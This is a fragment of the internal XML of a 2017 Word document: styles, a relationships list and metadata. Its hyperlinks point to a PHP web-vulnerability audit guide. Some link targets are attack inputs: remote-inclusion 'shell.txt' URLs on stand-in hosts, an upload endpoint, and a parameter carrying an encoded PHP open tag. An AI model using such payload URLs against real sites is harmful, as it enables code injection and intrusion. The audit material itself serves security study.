    <w:pPr>
      <w:spacing w:before="78"/>
      <w:ind w:left="274"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00623EE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23EEB"/>
    <w:rPr>
      <w:rFonts w:ascii="Lucida Console" w:eastAsia="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Consol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21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.jpeg"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://php.net/manual/en/wrappers.php.php)" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost/uploads/index.php?case=user&amp;amp;act=respon" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.jpeg"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.jpeg"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cnseay.com/" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer19.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.0day5.com/tiy/s.asp?f=demo_php_global_server" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.jpeg"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer9.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://&#32593;&#31449;&#22320;&#22336;/webservice/upload.php" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer18.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.jpeg"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.xxx.com/index.php" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.jpeg"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com/index.php?func=add.php" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1/path/xss.php?xss=phpcode" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost/uploads/index.php?case=user&amp;amp;act=respon" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.jpeg"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.jpeg"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.jpeg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.w3school.com.cn/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dpnishant.github.io/raptor/" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.jpeg"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost/Cmseasy/celive/live/header.php" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer11.xml"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://web/new/fenlei/search.php?mid=1&amp;amp;action=search&amp;amp;key" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.jpeg"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer10.xml"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer14.xml"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.crucco.com/huodongye.php?pn=zucefangsi" TargetMode="External"/><Relationship Id="rId96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www.codescan.com/" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.xxx.com/www/index.php" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer5.xml"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com/shell" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://xxx.xxxx.com/5107/upload/screenImagesSave.p" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.0day5.com/" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer6.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com/index.php" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer8.xml"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost/uploads/index.php?case=user&amp;amp;act=respon" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.jpeg"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer15.xml"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId101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hyperlink" Target="http://www.0day5.com/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpeg"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer7.xml"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.jpeg"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com/shell.txt" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://5.5.5.2/up2.php" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.jpeg"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://web/new/fenlei/do/jf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0.jpeg"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.crucco.com/huodongye.php?pn=str%3A%3C%3Fphp%20" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.0.108/phpyun3/weixin/index.php?m=index&amp;amp;c=inde" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://demo2.tp-shop.cn/index.php?m=Home&amp;amp;c=Api&amp;amp;a=get" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://xxx/simple-log/admin/admin.php?act=set_footer&amp;amp;file=blog.html" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://wiki.apache.org/httpd/DistrosDefaultLayout" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.jpeg"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.jpeg"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.jpeg"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://xxx/install/index.php" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.jpeg"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.jpeg"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.jpeg"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.jpeg"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.jpeg"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.jpeg"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.jpeg"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com/shell.txt%23" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.jpeg"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer16.xml"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer17.xml"/><Relationship Id="rId3" Type="http://schemas.microsoft.com/office/2007/relationships/stylesWithEffects" Target="stylesWithEffects.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.jpeg"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://hi.baidu.com/mmnwzsdvpkjovwr/item/3f7ceb39965145e" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer13.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.xxx.com/" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.jpeg"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer12.xml"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId88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193</Pages>
  <Words>7043</Words>
  <Characters>40149</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>334</Lines>
  <Paragraphs>94</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>47098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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-07-18T15:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-07-18T08:16:00Z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2016-11-16T00:00:00Z</vt:filetime>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="Creator">
    <vt:lpwstr>WPS Office</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="LastSaved">
    <vt:filetime>2017-07-18T00:00:00Z</vt:filetime>
  </property>
</Properties>
</file>